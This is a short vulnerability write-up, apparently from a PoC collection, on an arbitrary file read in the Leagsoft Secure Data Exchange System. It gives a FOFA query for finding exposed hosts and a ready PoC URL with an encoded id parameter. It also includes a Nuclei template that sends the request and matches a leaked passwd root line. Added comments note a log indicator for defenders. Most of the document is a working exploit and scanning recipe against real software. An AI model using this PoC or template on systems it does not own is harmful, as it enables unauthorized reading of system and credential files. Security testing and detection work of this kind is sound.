## 联软安全数据交换系统任意文件读取
## fofa
```
body="UniExServices"
```
## poc
```
/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=
```
## nuclei
```
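# Nuclei detection template. It sends one plain GET (no credentials or extra
# headers) to the /UniExServices/poserver.zz endpoint and reports the host when
# the response body contains a Unix passwd-style root entry, i.e. when the
# endpoint hands back file contents it should not serve.
#
# Layout note: the page this was taken from had lost all indentation and had
# stray "|" rows between lines; the nesting below is restored to the standard
# template structure (info / metadata / http / matchers) without changing any
# value.
#
# Detection note for defenders: the same request appears in web access logs as
# a GET to /UniExServices/poserver.zz with pgop=opendiskdoc in the query string.
# The source page names no fixed version or vendor advisory.
id: leagsoft-safedata-exchange-file-fileread

info:
  # name/description are in Chinese and read, roughly, "Leagsoft Secure Data
  # Exchange System arbitrary file read". Kept byte-for-byte.
  name: 联软安全数据交换系统任意文件读取
  author: mmy
  severity: high
  tags: leagsoft,fileread
  description: 联软安全数据交换系统任意文件读取
  # The source had `reference:` followed by a single empty list item, which
  # parses as a null entry. The page gives no reference URL, so the key is
  # omitted rather than left as an empty value.
  metadata:
    # Fingerprint query copied from the page; single-quoted so the inner double
    # quotes stay literal.
    fofa-query: 'body="UniExServices"'
    # Author's own claim; not independently re-checked here.
    verified: true
    max-request: 1

http:
  - method: GET
    path:
      # The id parameter is an opaque encoded value copied verbatim from the
      # page. Given the matcher below, it presumably resolves to the system
      # passwd file -- confirm before relying on that.
      - "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="

    matchers:
      # Body-only regex for the root line of a passwd file (password field "x"
      # or "*", uid 0, gid 0). There is no status-code condition, so any
      # response whose body contains that string is reported as a hit.
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"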
```